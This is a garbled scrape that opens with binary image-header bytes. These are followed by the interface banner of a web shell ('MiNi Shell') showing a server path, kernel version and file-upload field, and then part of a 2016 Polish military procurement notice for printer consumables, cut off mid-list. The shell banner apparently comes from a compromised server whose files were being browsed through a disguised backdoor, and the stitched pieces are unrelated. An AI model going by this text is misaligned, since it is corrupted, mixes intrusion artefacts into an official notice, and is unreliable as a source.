JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160510/116666-N-2016.html

<p class="kh_header"><b>Wędrzyn: Dostawa materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych</b><br>
<b>Numer ogłoszenia: 116666 - 2016; data zamieszczenia: 10.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 45 Wojskowy Oddział Gospodarczy , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa wraz z transportem, rozładowaniem i wniesieniem do magazynów Zamawiającego materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych, zgodnych z opisem przedmiotu zamówienia i polskimi normami przenoszącymi europejskie normy zharmonizowane.
Szczegółowy wykaz materiałów eksploatacyjnych wraz z szacunkową ilością przedmiotu zamówienia zawiera Formularz cenowy, stanowiący Załącznik nr 2 do SIWZ.
2.  Miejscem dostaw będzie magazyn 1W na terenie 45 WOG w Wędrzynie, magazyn 1M na terenie Jednostki Wojskowej 5700 w Międzyrzeczu. Zamawiający wymaga, aby dostawy były realizowane
      w całości zgodnie ze złożonym zleceniem. Koszty transportu związane z dostawą towarów ponosi
      Wykonawca. Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez
      Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
3.  Oferowane towary muszą spełniać wszystkie parametry określone w specyfikacji istotnych 
      warunków zamówienia i formularzu cenowym, być fabrycznie nowe i wolne od wad oraz posiadać 
      nienaruszone cechy pierwotnego opakowania.
4.  Materiały eksploatacyjne zostały wymienione w Formularzu cenowym  (Załącznik nr 2 do SIWZ)
     poprzez wskazanie symbolu oryginalnego produktu (OEM), do którego są przeznaczone.
5.  Zamawiający wymaga dostarczenia materiałów eksploatacyjnych fabrycznie nowych
    (nieużywanych), pełnowartościowych, kompatybilnych ze sprzętem, do którego są
     przeznaczone, oryginalnych lub równoważnych z zastrzeżeniem pkt 14.
6.  Oznakowanie wyrobu kodem kreskowym:
Wyroby należy oznakować kodem kreskowym zgodnie z Decyzją nr 3 MON Ministra Obrony Narodowej z dnia 3 stycznia 2014 r. w sprawie wytycznych określających wymagania w zakresie znakowania kodem kreskowym wyrobów dostarczanych do resortu obrony narodowej. Dostarczone wyroby powinny być oznakować zgodnie z 4 pkt.1 ppkt.5 (grupa materiałowa 5) ww. decyzji. Zastosowane etykiety powinny spełniać wymagania określone w 5 dla grupy materiałowej 5 ww. decyzji.
Zamawiający zobowiązuje Wykonawcę do przekazania wypełnionej Karty wyrobu w postaci elektronicznej (format MS Excel) do odbiorcy wyrobu zamówienia w karcie wyrobu Wykonawca powinien umieścić numer GTIN i dane uzupełniające wyrobu (zgodnie z załącznikiem nr 6 ww. decyzji). Wykonawca kartę wyrobu powinien przekazać do Odbiorcy zamówienia najpóźniej w dniu dostawy (opcjonalnie 14 dni przed dostawą Odbiorca wnioskuje o wprowadzenie identyfikatorów GTIN w systemie informatycznym JIM.). W przypadku, gdy do dnia realizacji umowy nie zostanie wyznaczony nr GLN Zamawiającego, wyroby w tej części nie będą znakowane kodem kreskowym.
7.   Materiały eksploatacyjne będą dostarczane sukcesywnie partiami, stosownie do potrzeb
       Zamawiającego.
8.   Wielkość i asortyment każdej partii materiałów eksploatacyjnych będzie wynikać z jednostronnej
      dyspozycji, tj. złożonego zamówienia na kwotę nie mniejszą niż 20.000,00 zł brutto jednorazowo,
      od osoby upoważnionej ze strony Zamawiającego.
9. Ceny  jednostkowe wskazane przez Wykonawcę w Formularzu cenowym w kolumnie nr  8
     (Załącznik nr 2 do SIWZ), służą dla celu porównania ofert  i przyznania  przez Zamawiającego 
     punktacji w kryterium Cena, a następnie do realizacji umowy z wyłonionym Wykonawcą.
     Ceny te będą niezmienne i będą obowiązywały przez cały okres obowiązywania umowy. 
10. Zamawiający informuje, że  ilości wskazane przez Zamawiającego w kolumnie nr 10  Formularza
      cenowego (Załącznik nr 2 do SIWZ) są ilościami szacunkowymi, które mogą ulec zmianie, tj.
      zwiększeniu lub zmniejszeniu w toku realizacji umowy.
11. Zamawiający zastrzega sobie prawo możliwości dokonywania zmian ilościowych w toku realizacji
      umowy w przedstawionym asortymencie stosownie do rzeczywistych potrzeb, przy zachowaniu  
      cen jednostkowych podanych przez Wykonawcę w Formularzu cenowym. 
 12. Zamawiający w toku realizacji umowy gwarantuje złożenie zamówień na poziomie co najmniej
       40% w ramach kwoty przeznaczonej na realizację zamówienia. 
13. Wykonawcy nie przysługują żadne roszczenia odszkodowawcze względem Zamawiającego 
       w przypadku niezrealizowania przez Zamawiającego  umowy na poziomie wyższym niż 40%
      w ramach kwoty przeznaczonej na realizację zamówienia.
14. Zamawiający dopuszcza możliwość składania ofert na materiały eksploatacyjne równoważne do
      materiałów produkowanych przez producentów drukarek, kserokopiarek i faksów, pod warunkiem, 
      że:
14.1. materiały eksploatacyjne równoważne (innych firm niż wymienione w specyfikacji) są
  fabrycznie nowe, bez śladów używania i uszkodzenia, w oryginalnych, hermetycznie 
  zamkniętych opakowaniach producenta, pełnowartościowe, nieregenerowane. 
   Pod pojęciem fabrycznie nowe należy rozumieć materiały, które w swoim całym procesie 
   produkcyjnym (za wyjątkiem kartonowego opakowania) są wytwarzane z elementów
  wytworzonych od podstaw, bez użycia w jakikolwiek sposób komponentów uzyskanych
  z innych produktów wcześniej użytkowanych (w szczególności dotyczy to obudowy);
14.2. ich stosowanie nie narusza praw gwarancyjnych producentów sprzętu. Wykonawca
          bierze na siebie pełną odpowiedzialność za uszkodzenia sprzętu spowodowane używaniem
          zaoferowanych materiałów. Wykonawca zobowiązuje się do zagwarantowania serwisu sprzętu 
         i pokrycia kosztów serwisowania w przypadku, gdyby usterka została wywołana przez
          stosowanie produktów równoważnych. W takim przypadku koszt ekspertyzy związanej z oceną 
          kwestionowanych materiałów oraz koszt ekspertyzy sprzętu ponosi Wykonawca;
14.3	. nie naruszają praw patentowych materiałów eksploatacyjnych pochodzących od producentów
  sprzętu;
14.4.	posiadają znak firmowy producenta oraz etykiety identyfikujące dany produkt pozwalające na ich identyfikację bez konieczności naruszania opakowania, z wszelkimi zabezpieczeniami stosowanymi przez producentów (np. hologramy) a także w sposób chroniący przed działaniem czynników zewnętrznych (hermetyczne wewnętrzne opakowanie);
14.5.	są kompatybilne ze sprzętem, do którego są przeznaczone, o parametrach takich samych bądź lepszych niż odpowiadające im produkty OEM (pojemność tuszu/ tonera, ilość uzyskanych kopii nie może być mniejsza niż dla produktów oryginalnych);
14.6.	materiały eksploatacyjne muszą być fabrycznie nowe, niewchodzące wcześniej (pierwotnie) w całości ani w części w skład innych materiałów (nieużywane). Muszą one posiadać znak firmowy producenta, etykiety zawierające numer katalogowy i termin jego ważności;
14.7.	w przypadku, kiedy produkt oryginalny posiada wbudowany układ scalony, który monitoruje proces druku i zużycie atramentu-tonera, produkt równoważny musi posiadać analogiczny element;
14.8.	oferowany asortyment będzie projektowany, wytwarzany i dystrybuowany pod nadzorem zintegrowanego systemu zarządzania jakością  zgodnie z ISO 9001:2008 i systemem zarządzania środowiskowego zgodnie z ISO 14001:2004 lub równoważnymi normami;
14.9.	jeżeli w trakcie trwania umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów niekorzystnie odbiega od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony) lub jeżeli produkt nie sygnalizuje we właściwy sposób stanu zużycia tuszu lub tonera, Wykonawca na żądanie Zamawiającego winien materiał oferowany w asortymencie, którego żądanie dotyczy, wymienić na materiał nowy, spełniający wymagania Zamawiającego.              W przypadku trzeciej reklamacji danego typu zamiennego materiału eksploatacyjnego Zamawiający ma prawo żądać dostaw materiałów oryginalnych producenta urządzenia (OEM), a Wykonawca jest zobowiązany dostarczyć takie materiały w cenach jednostkowych ofertowych, określonych w umowie. Taka zmiana asortymentu dostawy nie będzie stanowić zmiany umowy ani oferty, na podstawie której umowa została zawarta.
15.	Zamawiający nie dopuszcza materiałów eksploatacyjnych regenerowanych - nie zostaną one uznane za równoważne.
16.	Okres zdatności do użytku dostarczanych materiałów eksploatacyjnych nie może być krótszy niż 12 miesięcy od daty otrzymania przedmiotu zamówienia przez Zamawiającego.
17.	Wykonawca odpowiedzialny jest za jakość oraz zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań wynikających z umowy.
18.	W przypadku stwierdzenia niezgodności dostarczonego towaru lub dostarczenia towaru wadliwego, towar nie zostanie odebrany, a Wykonawca jest zobowiązany do dostarczenia towaru zgodnego z opisem przedmiotu zamówienia i wolnego od wad. 
19.	Wykonawca zobowiązany jest poinformować telefonicznie Zamawiającego o planowanej dostawie przynajmniej z dwudniowym wyprzedzeniem. Niedochowanie powyższych zapisów skutkować będzie nie przyjęciem dostawy przez Zamawiającego.
20.	Dostawy towarów do magazynów Zamawiającego odbywać się będą w dni robocze od poniedziałku do czwartku od godziny 8:00 do 13:00.
21.	Wykonawca zobowiązuje się do wystawiania faktur po dostarczeniu całego asortymentu do danego zamówienia.
22.	Zgodnie z art. 30 ust. 5 ustawy Prawo zamówień publicznych, Wykonawca, który zaoferuje
         produkty równoważne do opisywanych przez Zamawiającego, jest obowiązany wykazać, że
         oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego. 
         Wykonawca składając ofertę na produkty równoważne musi złożyć: 
22.1. certyfikaty potwierdzające, że oferowane materiały eksploatacyjne równoważne są 
         projektowane, produkowane i dystrybuowane pod nadzorem zintegrowanego systemu
         zarządzania jakością i zgodnie z wymogami norm ISO 9001:2008 i systemem zarządzania
         środowiskowego zgodnie z wymogami norm ISO 14001:2004 lub normami równoważnymi;
22.2. raporty z testów wydajności zgodnie z normami:
- ISO -IEC 19752 i ISO- IEC 19798 (odpowiednio dla kaset z tonerem do drukarek 
             monochromatycznych i kolorowych), 
- ISO- IEC 24711 (dla wkładów atramentowych)
lub norm równoważnych.
Raporty te muszą być sporządzone w  języku polskim oraz muszą zawierać wszystkie informacje wymagane przez wskazane normy.

22.3. dla materiałów, które nie podlegają ww normom - deklaracje zgodności oferowanego 
         produktu z produktem wytwarzanym przez producenta sprzętu, dla którego przeznaczony jest
         dany produkt pod względem zachowania podstawowych parametrów przewidzianych dla tego
         sprzętu.

UWAGA!
Dla celów umożliwienia weryfikacji do jakiej pozycji Formularza cenowego odnosi się przedłożony raport z testów wydajności-deklaracja zgodności, Wykonawca zobowiązany jest zamieścić w prawym górnym rogu tego dokumentu  oznaczenie pozycji z Formularza cenowego, której dokument dotyczy.

22.4.w przypadku, gdy producentem produktu równoważnego jest producent produktu odniesienia-
         produktu oryginalnego - dokumentem potwierdzającym wydajność może być wydruk ze strony
         internetowej producenta  (poświadczony za zgodność kopii dokumentu z oryginałem przez
         Wykonawcę).
22.5. oświadczenie Wykonawcy, że oferowane produkty równoważne są wyrobami fabrycznie
          nowymi, nieregenerowanymi, w pełni kompatybilnymi ze sprzętem, do którego są 
          przeznaczone, o parametrach takich samych w stosunku do typu zamawianego produktu 
          stanowiącego przedmiot zamówienia oraz że proces produkcji i stosowanie wyprodukowanych
          przez niego materiałów eksploatacyjnych nie narusza praw patentowych producentów
         oryginalnych tonerów, tuszy i kaset, jak również że użycie tego produktu do serwisowanych
         w ramach gwarancji urządzeń nie spowoduje uszkodzenia naruszającego warunki gwarancji 
         (wg wzoru Załącznik nr 8 do SIWZ).
23.    Materiały eksploatacyjne stanowiące przedmiot niniejszego postępowania, po ich zużyciu,
         zostaną przekazane Wykonawcy, wpisanemu do rejestru właściwego starosty (Ustawa o 
         odpadach z 14.12.2012r., Dz.U. 2013r., poz.21).
24.   Wykonawca zobowiązany jest do potwierdzenia transportu i odbioru odpadów na Karcie 
         Przekazania Odpadu wystawionej przez Odbiorcę według wzoru określonego w załączniku nr 5 
         do rozporządzenia Ministra Środowiska z dnia 8 grudnia 2010r. w sprawie wzorów dokumentów
         stosowanych na potrzeby ewidencji odpadów (Dz. U. 2010, nr 249, poz. 1673)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.00-2, 30.12.43.00-7, 30.19.21.13-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Ustala się wadium w wysokości 8.000,00 zł (słownie: osiem tysięcy złotych 00/100).
          2.  Wadium należy wnieść przed upływem terminu składania ofert. 
              Wadium można wnieść w   jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824 z późn. zm.).

Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 
            NBP oddział w Zielonej Górze nr 28 1010 1704 0060 0213 9120 1000 z dopiskiem: 

           Przetarg nieograniczony na  dostawę materiałów eksploatacyjnych do drukarek i urządzeń  
             wielofunkcyjnych.
       
Skuteczne wniesienie  wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych   na
 rachunek bankowy wskazany powyżej, przed upływem terminu składania ofert.

Stosowny dowód potwierdzający wniesienie wadium należy załączyć do oferty.
Termin ważności wadium złożonego w innej formie niż pieniądz, powinien obejmować cały okres związania ofertą. W przypadku form innych niż pieniądz, musi być precyzyjnie określone: kto jest gwarantem, beneficjentem oraz zleceniodawcą gwarancji, wysokość kwoty gwarancji, termin ważności oraz zobowiązanie podmiotu udzielającego gwarancji do zapłaty wadium w przypadkach przewidzianych w art. 46 ustawy, mianowicie: Wykonawca, którego oferta została wybrana odmówi podpisania umowy na warunkach określonych w ofercie, nie wniesie zabezpieczenia należytego wykonania umowy, zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy, Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 cyt. ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
Również poręczenie musi precyzyjnie określać, za kogo poręczyciel dokonuje poręczenia, do jakiej wysokości i na jaki czas oraz wskazywać przedmiot poręczenia.
Z treści gwarancji lub poręczenia musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta (poręczyciela). Gwarancja (poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikacją np. złożony wraz z imienną pieczątką lub czytelny  (z podaniem imienia i nazwiska). 
Gwarancja lub poręczenie powinno zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego - zgłoszone w terminie związania ofertą - wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji i art. 46 ust. 4 a i 5 ustawy - następuje jego bezwarunkowa wypłata, bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 

Dowodem wniesienia wadium w innej formie niż pieniądz jest załączenie do oferty kopii gwarancji lub poręczenia. 
Oryginał dokumentu (wadium w formie niepieniężnej) należy zdeponować w kancelarii jawnej (bud.33  II piętro, pok. 211), wskazanej jako miejsce składania ofert w terminie tożsamym, z terminem składania ofert, tj. 20.05.2016r. do godz. 9.45.

W przypadku wniesienia odwołania po otwarciu ofert Zamawiający, nie później niż na 7 dni przed upływem ważności wadium, wzywa Wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie kieruje się jedynie do Wykonawcy, którego ofertę wybrano jako najkorzystniejszą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada uprawnienie do wykonywania określonej
            działalności lub czynności, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp
            (zał. nr 3 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada niezbędną wiedzę i doświadczenie do   
            wykonywania zamówienia, jeżeli złoży oświadczenie, o którym mowa w art. 44
ustawy Pzp (zał. nr 3 do SIWZ) oraz wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (wg wzoru zawartego w Załączniku nr 8 do SIWZ), tj. co najmniej dwóch dostaw                  o wartości min. 150.000,00 zł brutto każda,  związanych z przedmiotem zamówienia oraz załączenia dowodów należytego ich wykonania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada niezbędny potencjał techniczny  do   wykonywania zamówienia, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp (zał. nr 3 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada osoby zdolne  do   wykonywania zamówienia, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp (zał. nr 3 do SIWZ);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca znajduje się w sytuacji ekonomicznej                
            i finansowej zapewniającej wykonanie zamówienia, jeżeli złoży oświadczenie, o
 którym mowa w art. 44 ustawy Pzp (zał. nr 3 do SIWZ) oraz ważnej na dzień składania
ofert kserokopii opłaconej polisy, a w przypadku jej braku innego dokumentu  potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w  zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
Wartość ubezpieczenia nie może być mniejsza niż 150.000,00 zł.
             Do polisy należy załączyć dowód jej opłacenia.
             Wykonawca zobowiązuje się, że będzie utrzymywał powyższy zakres ubezpieczenia   
do końca trwania umowy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>co najmniej dwóch dostaw o wartości min. 150.000,00 zł brutto każda,  związanych z przedmiotem zamówienia oraz załączenia dowodów należytego ich wykonania;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

